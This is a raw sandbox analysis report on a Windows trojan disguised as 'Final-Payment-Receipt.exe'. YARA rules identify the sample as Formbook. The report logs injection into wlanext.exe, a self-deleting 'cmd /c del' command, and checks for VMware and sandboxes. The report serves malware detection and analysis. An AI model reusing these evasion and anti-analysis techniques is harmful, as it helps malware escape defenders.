Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00409E3D	1_2_00409E3D
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013D4120	1_2_013D4120
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013BF900	1_2_013BF900
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013D99BF	1_2_013D99BF
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DA830	1_2_013DA830
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01471002	1_2_01471002
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0148E824	1_2_0148E824
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013E20A0	1_2_013E20A0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014828EC	1_2_014828EC
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013CB090	1_2_013CB090
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014820A8	1_2_014820A8
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0145CB4F	1_2_0145CB4F
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DA309	1_2_013DA309
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01482B28	1_2_01482B28
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DAB40	1_2_013DAB40
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013EEBB0	1_2_013EEBB0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0147DBD2	1_2_0147DBD2
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014703DA	1_2_014703DA
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014623E3	1_2_014623E3
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DEB9A	1_2_013DEB9A
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013E138B	1_2_013E138B
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013EABD8	1_2_013EABD8
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DB236	1_2_013DB236
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0146FA2B	1_2_0146FA2B
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01474AEF	1_2_01474AEF
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014822AE	1_2_014822AE
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013B0D20	1_2_013B0D20
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01481D55	1_2_01481D55
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01482D07	1_2_01482D07
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_014825DD	1_2_014825DD
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013E2581	1_2_013E2581
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01472D82	1_2_01472D82
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013CD5E0	1_2_013CD5E0
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0147D466	1_2_0147D466
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013C841F	1_2_013C841F
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013DB477	1_2_013DB477
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01474496	1_2_01474496
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0148DFCE	1_2_0148DFCE
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01481FF1	1_2_01481FF1
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013D6E30	1_2_013D6E30
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_013D5600	1_2_013D5600
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0147D616	1_2_0147D616
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01482EF7	1_2_01482EF7
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_01461EB6	1_2_01461EB6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373AB40	3_2_0373AB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037BCB4F	3_2_037BCB4F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E2B28	3_2_037E2B28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373A309	3_2_0373A309
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037C23E3	3_2_037C23E3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037D03DA	3_2_037D03DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0374ABD8	3_2_0374ABD8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037DDBD2	3_2_037DDBD2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0374EBB0	3_2_0374EBB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373EB9A	3_2_0373EB9A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0374138B	3_2_0374138B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373B236	3_2_0373B236
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037CFA2B	3_2_037CFA2B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037D4AEF	3_2_037D4AEF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E22AE	3_2_037E22AE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03734120	3_2_03734120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0371F900	3_2_0371F900
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037399BF	3_2_037399BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373A830	3_2_0373A830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037EE824	3_2_037EE824
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037D1002	3_2_037D1002
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E28EC	3_2_037E28EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037420A0	3_2_037420A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E20A8	3_2_037E20A8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0372B090	3_2_0372B090
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E1FF1	3_2_037E1FF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037EDFCE	3_2_037EDFCE
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03736E30	3_2_03736E30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037DD616	3_2_037DD616
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03735600	3_2_03735600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E2EF7	3_2_037E2EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037C1EB6	3_2_037C1EB6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E1D55	3_2_037E1D55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03710D20	3_2_03710D20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E2D07	3_2_037E2D07
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0372D5E0	3_2_0372D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037E25DD	3_2_037E25DD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_03742581	3_2_03742581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037D2D82	3_2_037D2D82
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0373B477	3_2_0373B477
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037DD466	3_2_037DD466
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0372841F	3_2_0372841F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_037D4496	3_2_037D4496
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EB9E40	3_2_02EB9E40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EB9E3D	3_2_02EB9E3D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EB2FB0	3_2_02EB2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECE5DA	3_2_02ECE5DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EB2D90	3_2_02EB2D90

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 0371B150 appears 145 times
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: String function: 013BB150 appears 145 times

Sample file is different than original file name gathered from version info

Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
Source: Final-Payment-Receipt.exe	Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe

Yara signature match

Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Final-Payment-Receipt.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@5/3

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'	Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 0_2_055E556E push eax; ret	0_2_055E556F
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041B11C push es; iretd	1_2_0041B11D
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0040E3C1 pushad ; ret	1_2_0040E3DA
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0040E417 pushad ; ret	1_2_0040E3DA
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_00417619 pushfd ; ret	1_2_0041761D
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041CEC5 push eax; ret	1_2_0041CF18
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041CF7C push eax; ret	1_2_0041CF82
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041CF12 push eax; ret	1_2_0041CF18
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0041CF1B push eax; ret	1_2_0041CF82
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Code function: 1_2_0140D0D1 push ecx; ret	1_2_0140D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_0376D0D1 push ecx; ret	3_2_0376D0E4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECDA3E push 00000072h; ret	3_2_02ECDA40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EBE3C1 pushad ; ret	3_2_02EBE3DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECB11C push es; iretd	3_2_02ECB11D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECCEC5 push eax; ret	3_2_02ECCF18
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EC7619 pushfd ; ret	3_2_02EC761D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECCF7C push eax; ret	3_2_02ECCF82
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECCF1B push eax; ret	3_2_02ECCF82
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02ECCF12 push eax; ret	3_2_02ECCF18
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 3_2_02EBE417 pushad ; ret	3_2_02EBE3DA

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY

Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772	Thread sleep time: -52501s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4568	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4568	Thread sleep time: -78000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456	Thread sleep time: -75000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II\|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
